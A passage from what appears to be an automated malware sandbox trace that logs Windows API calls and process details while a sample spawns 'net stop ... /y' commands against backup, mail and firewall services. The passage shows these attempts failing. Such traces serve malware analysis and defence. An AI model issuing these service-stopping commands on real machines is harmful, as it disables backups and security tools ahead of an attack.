(_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0197.596] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29f7fc | out: Buffer=0x29f7fc*=0x5b1c98) returned 0x0 [0197.596] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29f7fc | out: Buffer=0x29f7fc*=0x5b1cb0) returned 0x0 [0197.596] _fileno (_File=0x74eb2900) returned -2 [0197.596] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0197.596] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0197.596] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0197.596] _wcsicmp (_String1="config", _String2="stop") returned -16 [0197.596] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0197.596] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0197.596] _wcsicmp (_String1="file", _String2="stop") returned -13 [0197.596] _wcsicmp (_String1="files", _String2="stop") returned -13 [0197.596] _wcsicmp (_String1="group", _String2="stop") returned -12 [0197.596] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0197.596] _wcsicmp (_String1="help", _String2="stop") returned -11 [0197.596] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0197.596] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0197.596] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0197.596] _wcsicmp (_String1="session", _String2="stop") returned -15 [0197.596] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0197.596] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0197.596] _wcsicmp (_String1="share", _String2="stop") returned -12 [0197.596] _wcsicmp (_String1="start", _String2="stop") returned -14 [0197.596] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0197.596] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0197.596] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0197.596] _wcsicmp (_String1="accounts", _String2="BackupExecManagementService") returned -1 [0197.596] _wcsicmp (_String1="computer", _String2="BackupExecManagementService") returned 1 [0197.596] _wcsicmp (_String1="config", _String2="BackupExecManagementService") returned 1 [0197.596] _wcsicmp (_String1="continue", _String2="BackupExecManagementService") returned 1 [0197.596] _wcsicmp (_String1="cont", _String2="BackupExecManagementService") returned 1 [0197.596] _wcsicmp (_String1="file", _String2="BackupExecManagementService") returned 4 [0197.596] _wcsicmp (_String1="files", _String2="BackupExecManagementService") returned 4 [0197.597] _wcsicmp (_String1="group", _String2="BackupExecManagementService") returned 5 [0197.597] _wcsicmp (_String1="groups", _String2="BackupExecManagementService") returned 5 [0197.597] _wcsicmp (_String1="help", _String2="BackupExecManagementService") returned 6 [0197.597] _wcsicmp (_String1="helpmsg", _String2="BackupExecManagementService") returned 6 [0197.597] _wcsicmp (_String1="localgroup", _String2="BackupExecManagementService") returned 10 [0197.597] _wcsicmp (_String1="pause", _String2="BackupExecManagementService") returned 14 [0197.597] _wcsicmp (_String1="session", _String2="BackupExecManagementService") returned 17 [0197.597] _wcsicmp (_String1="sessions", _String2="BackupExecManagementService") returned 17 [0197.597] _wcsicmp (_String1="sess", _String2="BackupExecManagementService") returned 17 [0197.597] _wcsicmp (_String1="share", _String2="BackupExecManagementService") returned 17 [0197.597] _wcsicmp (_String1="start", _String2="BackupExecManagementService") returned 17 [0197.597] _wcsicmp (_String1="stats", _String2="BackupExecManagementService") returned 17 [0197.597] _wcsicmp (_String1="statistics", _String2="BackupExecManagementService") returned 17 [0197.597] _wcsicmp (_String1="stop", _String2="BackupExecManagementService") returned 17 [0197.597] _wcsicmp (_String1="time", _String2="BackupExecManagementService") returned 18 [0197.597] _wcsicmp (_String1="user", _String2="BackupExecManagementService") returned 19 [0197.597] _wcsicmp (_String1="users", _String2="BackupExecManagementService") returned 19 [0197.597] _wcsicmp (_String1="msg", _String2="BackupExecManagementService") returned 11 [0197.597] _wcsicmp (_String1="messenger", _String2="BackupExecManagementService") returned 11 [0197.597] _wcsicmp (_String1="receiver", _String2="BackupExecManagementService") returned 16 [0197.597] _wcsicmp (_String1="rcv", _String2="BackupExecManagementService") returned 16 [0197.597] _wcsicmp (_String1="netpopup", _String2="BackupExecManagementService") returned 12 [0197.597] _wcsicmp (_String1="redirector", _String2="BackupExecManagementService") returned 16 [0197.597] _wcsicmp (_String1="redir", _String2="BackupExecManagementService") returned 16 [0197.597] _wcsicmp (_String1="rdr", _String2="BackupExecManagementService") returned 16 [0197.597] _wcsicmp (_String1="workstation", _String2="BackupExecManagementService") returned 21 [0197.597] _wcsicmp (_String1="work", _String2="BackupExecManagementService") returned 21 [0197.597] _wcsicmp (_String1="wksta", _String2="BackupExecManagementService") returned 21 [0197.597] _wcsicmp (_String1="prdr", _String2="BackupExecManagementService") returned 14 [0197.597] _wcsicmp (_String1="devrdr", _String2="BackupExecManagementService") returned 2 [0197.597] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecManagementService") returned 10 [0197.597] _wcsicmp (_String1="server", _String2="BackupExecManagementService") returned 17 [0197.597] _wcsicmp (_String1="svr", _String2="BackupExecManagementService") returned 17 [0197.597] _wcsicmp (_String1="srv", _String2="BackupExecManagementService") returned 17 [0197.597] _wcsicmp (_String1="lanmanserver", _String2="BackupExecManagementService") returned 10 [0197.597] _wcsicmp (_String1="alerter", _String2="BackupExecManagementService") returned -1 [0197.597] _wcsicmp (_String1="netlogon", _String2="BackupExecManagementService") returned 12 [0197.598] _wcsupr (in: _String="BackupExecManagementService" | out: _String="BACKUPEXECMANAGEMENTSERVICE") returned="BACKUPEXECMANAGEMENTSERVICE" [0197.598] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5b54e0 [0197.600] GetServiceKeyNameW (in: hSCManager=0x5b54e0, lpDisplayName="BACKUPEXECMANAGEMENTSERVICE", lpServiceName=0x78aaf0, lpcchBuffer=0x29f798 | out: lpServiceName="", lpcchBuffer=0x29f798) returned 0 [0197.601] _wcsicmp (_String1="msg", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 11 [0197.601] _wcsicmp (_String1="messenger", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 11 [0197.601] _wcsicmp (_String1="receiver", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0197.601] _wcsicmp (_String1="rcv", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0197.601] _wcsicmp (_String1="redirector", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0197.601] _wcsicmp (_String1="redir", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0197.601] _wcsicmp (_String1="rdr", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 16 [0197.601] _wcsicmp (_String1="workstation", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 21 [0197.601] _wcsicmp (_String1="work", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 21 [0197.601] _wcsicmp (_String1="wksta", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 21 [0197.601] _wcsicmp (_String1="prdr", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 14 [0197.601] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 2 [0197.601] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 10 [0197.601] _wcsicmp (_String1="server", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 17 [0197.601] _wcsicmp (_String1="svr", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 17 [0197.601] _wcsicmp (_String1="srv", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 17 [0197.601] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 10 [0197.601] _wcsicmp (_String1="alerter", _String2="BACKUPEXECMANAGEMENTSERVICE") returned -1 [0197.601] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECMANAGEMENTSERVICE") returned 12 [0197.601] NetServiceControl (in: servername=0x0, service="BACKUPEXECMANAGEMENTSERVICE", opcode=0x0, arg=0x0, bufptr=0x29f794 | out: bufptr=0x29f794) returned 0x889 [0197.602] wcscpy_s (in: _Destination=0x78a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0197.602] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0197.603] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x78b338, nSize=0x800, Arguments=0x789dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0197.604] GetFileType (hFile=0x26c) returned 0x3 [0197.604] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5b3ca8 [0197.604] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5b3ca8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0197.604] WriteFile (in: hFile=0x26c, lpBuffer=0x5b3ca8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x29f6d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f6d4, lpOverlapped=0x0) returned 0 [0197.604] LocalFree (hMem=0x5b3ca8) returned 0x0 [0197.604] GetFileType (hFile=0x26c) returned 0x3 [0197.604] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5b62a8 [0197.604] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5b62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n[", lpUsedDefaultChar=0x0) returned 2 [0197.604] WriteFile (in: hFile=0x26c, lpBuffer=0x5b62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29f6d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f6d4, lpOverlapped=0x0) returned 0 [0197.604] LocalFree (hMem=0x5b62a8) returned 0x0 [0197.604] _ultow (in: _Dest=0x889, _Radix=2750212 | out: _Dest=0x889) returned="2185" [0197.604] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x78b338, nSize=0x800, Arguments=0x789dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0197.604] GetFileType (hFile=0x26c) returned 0x3 [0197.604] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5b62a8 [0197.604] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5b62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0197.604] WriteFile (in: hFile=0x26c, lpBuffer=0x5b62a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x29f6e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f6e0, lpOverlapped=0x0) returned 0 [0197.604] LocalFree (hMem=0x5b62a8) returned 0x0 [0197.605] GetFileType (hFile=0x26c) returned 0x3 [0197.605] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5b62a8 [0197.605] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5b62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n[", lpUsedDefaultChar=0x0) returned 2 [0197.605] WriteFile (in: hFile=0x26c, lpBuffer=0x5b62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29f6e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f6e0, lpOverlapped=0x0) returned 0 [0197.605] LocalFree (hMem=0x5b62a8) returned 0x0 [0197.605] NetApiBufferFree (Buffer=0x5b1c98) returned 0x0 [0197.605] NetApiBufferFree (Buffer=0x5b1cb0) returned 0x0 [0197.605] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecManagementService /y" [0197.605] exit (_Code=2) Process: id = "136" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x54a18000" os_pid = "0xa30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SMTPSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 309 os_tid = 0xa34 Process: id = "137" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x617b6000" os_pid = "0x8bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "136" os_parent_pid = "0xa30" cmd_line = "C:\\Windows\\system32\\net1 stop SMTPSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 310 os_tid = 0xa50 [0197.749] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36f8dc | out: lpSystemTimeAsFileTime=0x36f8dc*(dwLowDateTime=0x3f0fbfa0, dwHighDateTime=0x1d57a87)) [0197.749] GetCurrentProcessId () returned 0x8bc [0197.749] GetCurrentThreadId () returned 0xa50 [0197.749] GetTickCount () returned 0x116b194 [0197.749] QueryPerformanceCounter (in: lpPerformanceCount=0x36f8d4 | out: lpPerformanceCount=0x36f8d4*=31803365442) returned 1 [0197.749] GetModuleHandleA (lpModuleName=0x0) returned 0x180000 [0197.749] __set_app_type (_Type=0x1) [0197.749] __p__fmode () returned 0x74eb31f4 [0197.749] __p__commode () returned 0x74eb31fc [0197.750] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x18ffe6) returned 0x0 [0197.750] __getmainargs (in: _Argc=0x199064, _Argv=0x19906c, _Env=0x199068, _DoWildCard=0, _StartInfo=0x199024 | out: _Argc=0x199064, _Argv=0x19906c, _Env=0x199068) returned 0 [0197.750] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0197.750] GetConsoleOutputCP () returned 0x1b5 [0197.750] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x199080 | out: lpCPInfo=0x199080) returned 1 [0197.750] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.753] sprintf_s (in: _DstBuf=0x36f894, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0197.753] setlocale (category=0, locale=".437") returned="English_United States.437" [0197.755] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0197.755] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0197.755] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SMTPSvc /y" [0197.755] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x36f660, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0197.755] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x0, Size=0x62) returned 0x3b3c00 [0197.755] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0197.756] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36f864 | out: Buffer=0x36f864*=0x3b1c60) returned 0x0 [0197.756] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36f864 | out: Buffer=0x36f864*=0x3b1c78) returned 0x0 [0197.756] _fileno (_File=0x74eb2900) returned -2 [0197.756] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0197.756] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0197.756] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0197.756] _wcsicmp (_String1="config", _String2="stop") returned -16 [0197.756] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0197.756] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0197.756] _wcsicmp (_String1="file", _String2="stop") returned -13 [0197.756] _wcsicmp (_String1="files", _String2="stop") returned -13 [0197.756] _wcsicmp (_String1="group", _String2="stop") returned -12 [0197.756] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0197.756] _wcsicmp (_String1="help", _String2="stop") returned -11 [0197.756] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0197.756] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0197.756] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0197.756] _wcsicmp (_String1="session", _String2="stop") returned -15 [0197.756] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0197.756] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0197.756] _wcsicmp (_String1="share", _String2="stop") returned -12 [0197.756] _wcsicmp (_String1="start", _String2="stop") returned -14 [0197.756] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0197.756] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0197.756] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0197.756] _wcsicmp (_String1="accounts", _String2="SMTPSvc") returned -18 [0197.756] _wcsicmp (_String1="computer", _String2="SMTPSvc") returned -16 [0197.756] _wcsicmp (_String1="config", _String2="SMTPSvc") returned -16 [0197.756] _wcsicmp (_String1="continue", _String2="SMTPSvc") returned -16 [0197.756] _wcsicmp (_String1="cont", _String2="SMTPSvc") returned -16 [0197.756] _wcsicmp (_String1="file", _String2="SMTPSvc") returned -13 [0197.756] _wcsicmp (_String1="files", _String2="SMTPSvc") returned -13 [0197.756] _wcsicmp (_String1="group", _String2="SMTPSvc") returned -12 [0197.756] _wcsicmp (_String1="groups", _String2="SMTPSvc") returned -12 [0197.757] _wcsicmp (_String1="help", _String2="SMTPSvc") returned -11 [0197.757] _wcsicmp (_String1="helpmsg", _String2="SMTPSvc") returned -11 [0197.757] _wcsicmp (_String1="localgroup", _String2="SMTPSvc") returned -7 [0197.757] _wcsicmp (_String1="pause", _String2="SMTPSvc") returned -3 [0197.757] _wcsicmp (_String1="session", _String2="SMTPSvc") returned -8 [0197.757] _wcsicmp (_String1="sessions", _String2="SMTPSvc") returned -8 [0197.757] _wcsicmp (_String1="sess", _String2="SMTPSvc") returned -8 [0197.757] _wcsicmp (_String1="share", _String2="SMTPSvc") returned -5 [0197.757] _wcsicmp (_String1="start", _String2="SMTPSvc") returned 7 [0197.757] _wcsicmp (_String1="stats", _String2="SMTPSvc") returned 7 [0197.757] _wcsicmp (_String1="statistics", _String2="SMTPSvc") returned 7 [0197.757] _wcsicmp (_String1="stop", _String2="SMTPSvc") returned 7 [0197.757] _wcsicmp (_String1="time", _String2="SMTPSvc") returned 1 [0197.757] _wcsicmp (_String1="user", _String2="SMTPSvc") returned 2 [0197.757] _wcsicmp (_String1="users", _String2="SMTPSvc") returned 2 [0197.757] _wcsicmp (_String1="msg", _String2="SMTPSvc") returned -6 [0197.757] _wcsicmp (_String1="messenger", _String2="SMTPSvc") returned -6 [0197.757] _wcsicmp (_String1="receiver", _String2="SMTPSvc") returned -1 [0197.757] _wcsicmp (_String1="rcv", _String2="SMTPSvc") returned -1 [0197.757] _wcsicmp (_String1="netpopup", _String2="SMTPSvc") returned -5 [0197.757] _wcsicmp (_String1="redirector", _String2="SMTPSvc") returned -1 [0197.757] _wcsicmp (_String1="redir", _String2="SMTPSvc") returned -1 [0197.757] _wcsicmp (_String1="rdr", _String2="SMTPSvc") returned -1 [0197.757] _wcsicmp (_String1="workstation", _String2="SMTPSvc") returned 4 [0197.757] _wcsicmp (_String1="work", _String2="SMTPSvc") returned 4 [0197.757] _wcsicmp (_String1="wksta", _String2="SMTPSvc") returned 4 [0197.757] _wcsicmp (_String1="prdr", _String2="SMTPSvc") returned -3 [0197.757] _wcsicmp (_String1="devrdr", _String2="SMTPSvc") returned -15 [0197.757] _wcsicmp (_String1="lanmanworkstation", _String2="SMTPSvc") returned -7 [0197.757] _wcsicmp (_String1="server", _String2="SMTPSvc") returned -8 [0197.757] _wcsicmp (_String1="svr", _String2="SMTPSvc") returned 9 [0197.757] _wcsicmp (_String1="srv", _String2="SMTPSvc") returned 5 [0197.757] _wcsicmp (_String1="lanmanserver", _String2="SMTPSvc") returned -7 [0197.757] _wcsicmp (_String1="alerter", _String2="SMTPSvc") returned -18 [0197.757] _wcsicmp (_String1="netlogon", _String2="SMTPSvc") returned -5 [0197.758] _wcsupr (in: _String="SMTPSvc" | out: _String="SMTPSVC") returned="SMTPSVC" [0197.758] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3b54b8 [0197.760] GetServiceKeyNameW (in: hSCManager=0x3b54b8, lpDisplayName="SMTPSVC", lpServiceName=0x19aaf0, lpcchBuffer=0x36f800 | out: lpServiceName="", lpcchBuffer=0x36f800) returned 0 [0197.761] _wcsicmp (_String1="msg", _String2="SMTPSVC") returned -6 [0197.761] _wcsicmp (_String1="messenger", _String2="SMTPSVC") returned -6 [0197.761] _wcsicmp (_String1="receiver", _String2="SMTPSVC") returned -1 [0197.761] _wcsicmp (_String1="rcv", _String2="SMTPSVC") returned -1 [0197.761] _wcsicmp (_String1="redirector", _String2="SMTPSVC") returned -1 [0197.761] _wcsicmp (_String1="redir", _String2="SMTPSVC") returned -1 [0197.761] _wcsicmp (_String1="rdr", _String2="SMTPSVC") returned -1 [0197.761] _wcsicmp (_String1="workstation", _String2="SMTPSVC") returned 4 [0197.761] _wcsicmp (_String1="work", _String2="SMTPSVC") returned 4 [0197.761] _wcsicmp (_String1="wksta", _String2="SMTPSVC") returned 4 [0197.761] _wcsicmp (_String1="prdr", _String2="SMTPSVC") returned -3 [0197.761] _wcsicmp (_String1="devrdr", _String2="SMTPSVC") returned -15 [0197.761] _wcsicmp (_String1="lanmanworkstation", _String2="SMTPSVC") returned -7 [0197.761] _wcsicmp (_String1="server", _String2="SMTPSVC") returned -8 [0197.761] _wcsicmp (_String1="svr", _String2="SMTPSVC") returned 9 [0197.761] _wcsicmp (_String1="srv", _String2="SMTPSVC") returned 5 [0197.761] _wcsicmp (_String1="lanmanserver", _String2="SMTPSVC") returned -7 [0197.761] _wcsicmp (_String1="alerter", _String2="SMTPSVC") returned -18 [0197.761] _wcsicmp (_String1="netlogon", _String2="SMTPSVC") returned -5 [0197.761] NetServiceControl (in: servername=0x0, service="SMTPSVC", opcode=0x0, arg=0x0, bufptr=0x36f7fc | out: bufptr=0x36f7fc) returned 0x889 [0197.762] wcscpy_s (in: _Destination=0x19a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0197.762] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0197.763] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x19b338, nSize=0x800, Arguments=0x199dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0197.764] GetFileType (hFile=0x26c) returned 0x3 [0197.764] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3b3fe8 [0197.764] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3b3fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0197.764] WriteFile (in: hFile=0x26c, lpBuffer=0x3b3fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x36f73c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36f73c, lpOverlapped=0x0) returned 0 [0197.764] LocalFree (hMem=0x3b3fe8) returned 0x0 [0197.765] GetFileType (hFile=0x26c) returned 0x3 [0197.765] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3b6290 [0197.765] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3b6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n;", lpUsedDefaultChar=0x0) returned 2 [0197.765] WriteFile (in: hFile=0x26c, lpBuffer=0x3b6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36f73c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36f73c, lpOverlapped=0x0) returned 0 [0197.765] LocalFree (hMem=0x3b6290) returned 0x0 [0197.765] _ultow (in: _Dest=0x889, _Radix=3602284 | out: _Dest=0x889) returned="2185" [0197.765] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x19b338, nSize=0x800, Arguments=0x199dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0197.765] GetFileType (hFile=0x26c) returned 0x3 [0197.765] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3b6290 [0197.765] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3b6290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0197.765] WriteFile (in: hFile=0x26c, lpBuffer=0x3b6290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x36f748, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36f748, lpOverlapped=0x0) returned 0 [0197.765] LocalFree (hMem=0x3b6290) returned 0x0 [0197.765] GetFileType (hFile=0x26c) returned 0x3 [0197.765] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3b6290 [0197.765] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3b6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n;", lpUsedDefaultChar=0x0) returned 2 [0197.765] WriteFile (in: hFile=0x26c, lpBuffer=0x3b6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36f748, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36f748, lpOverlapped=0x0) returned 0 [0197.765] LocalFree (hMem=0x3b6290) returned 0x0 [0197.766] NetApiBufferFree (Buffer=0x3b1c60) returned 0x0 [0197.766] NetApiBufferFree (Buffer=0x3b1c78) returned 0x0 [0197.766] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SMTPSvc /y" [0197.766] exit (_Code=2) Process: id = "138" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x56e1d000" os_pid = "0xa1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop mfefire /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 311 os_tid = 0xa28 Process: id = "139" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x52dc0000" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "138" os_parent_pid = "0xa1c" cmd_line = "C:\\Windows\\system32\\net1 stop mfefire /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], 